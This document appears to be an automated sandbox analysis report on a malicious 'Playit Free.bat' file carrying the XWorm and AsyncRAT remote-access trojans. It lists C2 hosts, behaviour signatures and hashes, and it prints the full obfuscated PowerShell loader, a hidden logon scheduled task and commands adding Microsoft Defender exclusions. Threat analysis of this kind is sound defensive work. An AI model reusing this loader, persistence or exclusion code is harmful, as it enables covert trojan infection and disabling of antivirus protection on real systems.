Overview

overview

10

Static

static

1

Playit Free.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 13:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Playit Free.bat

  • Size

    292KB

  • MD5

    2bac01a226b5c7b08de93311ab9905d5

  • SHA1

    48144153d2ca3d9cc7e27506b3d1923c9d80cc7a

  • SHA256

    bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186

  • SHA512

    96f50b01f8c69befabbb307c5e4b58e304ec5d8339c9cca4bf927add6ec9f912ca4c87f5e13ec3c34737e47a7ab35d15de32c4b8b84c11e05dccfc9b5ce3f7f6

  • SSDEEP

    6144:JLbgUUyQ6VV3W7bmjOk8Cl/iZYwD6rjwY+H+4hjhphHCxsu:JLbgPyQ6z3DOERkDUIHLlJu

Score
10/10
asyncratxwormdefaultexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

super-nearest.gl.at.ply.gg:17835

best-bird.gl.at.ply.gg:27196

wiz.bounceme.net:6000
Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

asyncrat

Botnet

Default

C2

finally-grande.gl.at.ply.gg:25844

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Detect Xworm Payload 5 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Playit Free.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+SIhEEEdUoAvS3C0hLoK1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eejjc=New-Object System.IO.MemoryStream(,$param_var); $rNGlN=New-Object System.IO.MemoryStream; $fjHYd=New-Object System.IO.Compression.GZipStream($Eejjc, [IO.Compression.CompressionMode]::Decompress); $fjHYd.CopyTo($rNGlN); $fjHYd.Dispose(); $Eejjc.Dispose(); $rNGlN.Dispose(); $rNGlN.ToArray();}function execute_function($param_var,$param2_var){ $BawPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvyFJ=$BawPg.EntryPoint; $DvyFJ.Invoke($null, $param2_var);}$FmsBL = 'C:\Users\Admin\AppData\Local\Temp\Playit Free.bat';$host.UI.RawUI.WindowTitle = $FmsBL;$LeiwM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FmsBL).Split([Environment]::NewLine);foreach ($OYikl in $LeiwM) { if ($OYikl.StartsWith('riSZShbqVrDJFHBMOGEs')) { $adCgQ=$OYikl.Substring(20); break; }}$payloads_var=[string[]]$adCgQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:1404
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_82_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4060
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs"
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nkzg1mkfrHDUSX6khNCFu2GC0GRW40N8z0jb2WU/2wk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+SIhEEEdUoAvS3C0hLoK1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eejjc=New-Object System.IO.MemoryStream(,$param_var); $rNGlN=New-Object System.IO.MemoryStream; $fjHYd=New-Object System.IO.Compression.GZipStream($Eejjc, [IO.Compression.CompressionMode]::Decompress); $fjHYd.CopyTo($rNGlN); $fjHYd.Dispose(); $Eejjc.Dispose(); $rNGlN.Dispose(); $rNGlN.ToArray();}function execute_function($param_var,$param2_var){ $BawPg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DvyFJ=$BawPg.EntryPoint; $DvyFJ.Invoke($null, $param2_var);}$FmsBL = 'C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat';$host.UI.RawUI.WindowTitle = $FmsBL;$LeiwM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($FmsBL).Split([Environment]::NewLine);foreach ($OYikl in $LeiwM) { if ($OYikl.StartsWith('riSZShbqVrDJFHBMOGEs')) { $adCgQ=$OYikl.Substring(20); break; }}$payloads_var=[string[]]$adCgQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
              5⤵
                PID:1044
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                5⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:4324
                • C:\Users\Admin\AppData\Local\Temp\scvhost.exe
                  "C:\Users\Admin\AppData\Local\Temp\scvhost.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:3404
                • C:\Users\Admin\AppData\Local\Temp\mshta.exe
                  "C:\Users\Admin\AppData\Local\Temp\mshta.exe"
                  6⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4068
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mshta.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4536
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4112
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4352
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3496
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2860,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=4012 /prefetch:8
        1⤵
          PID:1060

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          661739d384d9dfd807a089721202900b

          SHA1

          5b2c5d6a7122b4ce849dc98e79a7713038feac55

          SHA256

          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

          SHA512

          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
          Filesize

          2KB

          MD5

          005bc2ef5a9d890fb2297be6a36f01c2

          SHA1

          0c52adee1316c54b0bfdc510c0963196e7ebb430

          SHA256

          342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

          SHA512

          f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          77d622bb1a5b250869a3238b9bc1402b

          SHA1

          d47f4003c2554b9dfc4c16f22460b331886b191b

          SHA256

          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

          SHA512

          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          d65ebc84c6b0b52901fb46f5e2b83ab5

          SHA1

          d036a0c3eb9e1616d0f7f5ca41171060c13a3095

          SHA256

          d45581b0807a0d04a70ec75e3e4575e73f148e5b4e0d3d325dfbd6400a4bfbd1

          SHA512

          88ac232e7702ebd53788cf8429d266ae367111bfccf4bc9d40ead25b552347521458ca60d320e2775b5d2edcaf8501251cb2db68b38dc000ac50463fb80865be

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          12c844ed8342738dacc6eb0072c43257

          SHA1

          b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

          SHA256

          2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

          SHA512

          e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_orr2a3kg.dmp.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\mshta.exe
          Filesize

          70KB

          MD5

          c5431c4b11742bc4ab73e896dd47153b

          SHA1

          16e6869c71d4ee978dfcc29b48f277f55828a331

          SHA256

          bc404ae20b7085100cd7a7efddb28ce54014309bdbd60a5d57c135d44b950c4a

          SHA512

          888a843e81400b900fb5a36ff171b03149d2719406e778614809cfaaa7e81e2e9deb6807d01ff1cec7ed1db30b585121fc8606d2bc52ffc5fc4d86e9d2b12f37

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\scvhost.exe
          Filesize

          63KB

          MD5

          1ca366d46cb1726508257459a9cbbf3f

          SHA1

          183e7cd4165bd195cb05c7e474037f2a22707c67

          SHA256

          76bb01ad0452e2f834661d54744645a14d057be883ad51d2b447f8d6c48d5129

          SHA512

          aec28910c3f2015ea252d9e2c1a497eec8fd3ef0bc4ff0bf42a593f159a3539df8ec7b01487def04099ca68040ec3d484492319b7bfbafedcbd7bcc2627e67be

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Windows_Log_82.bat
          Filesize

          292KB

          MD5

          2bac01a226b5c7b08de93311ab9905d5

          SHA1

          48144153d2ca3d9cc7e27506b3d1923c9d80cc7a

          SHA256

          bf73489935f2d196e04d1eb012f3c8ab16263fb3d005aac58d63322313db1186

          SHA512

          96f50b01f8c69befabbb307c5e4b58e304ec5d8339c9cca4bf927add6ec9f912ca4c87f5e13ec3c34737e47a7ab35d15de32c4b8b84c11e05dccfc9b5ce3f7f6

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Windows_Log_82.vbs
          Filesize

          114B

          MD5

          e39c831199e0dff67c3230b04f978409

          SHA1

          865806658353cb771d47bbf60c6942f57104c631

          SHA256

          9f35c6f9f6446ee00eb1bb7f9031f113f6c35c0322e0d2ef4ec7f82af7cf6398

          SHA512

          ee355d5bbe6fdffc1f0fd705cb101cc01a41577da058ed3668fb6f0a44063b5f16df3718f4bee5ffcb4c66bec6869101061b87f74618872fd6e2609ee7f85dfd

          Download Submit
        • memory/2124-55-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/2124-14-0x00000164FEE90000-0x00000164FEF06000-memory.dmp
          Filesize

          472KB

          Download
        • memory/2124-1-0x00000164E4810000-0x00000164E4832000-memory.dmp
          Filesize

          136KB

          Download
        • memory/2124-11-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/2124-12-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/2124-16-0x00000164E4870000-0x00000164E48B8000-memory.dmp
          Filesize

          288KB

          Download
        • memory/2124-15-0x00000164E4860000-0x00000164E4868000-memory.dmp
          Filesize

          32KB

          Download
        • memory/2124-13-0x00000164FEA40000-0x00000164FEA84000-memory.dmp
          Filesize

          272KB

          Download
        • memory/2124-0-0x00007FFF009A3000-0x00007FFF009A5000-memory.dmp
          Filesize

          8KB

          Download
        • memory/3404-76-0x00000000006D0000-0x00000000006E6000-memory.dmp
          Filesize

          88KB

          Download
        • memory/4060-29-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4060-27-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4060-28-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4060-32-0x00007FFF009A0000-0x00007FFF01461000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4068-77-0x0000000000290000-0x00000000002A8000-memory.dmp
          Filesize

          96KB

          Download
        • memory/4068-124-0x000000001C060000-0x000000001C06E000-memory.dmp
          Filesize

          56KB

          Download
        • memory/4324-54-0x000001F1FC570000-0x000001F1FC58A000-memory.dmp
          Filesize

          104KB

          Download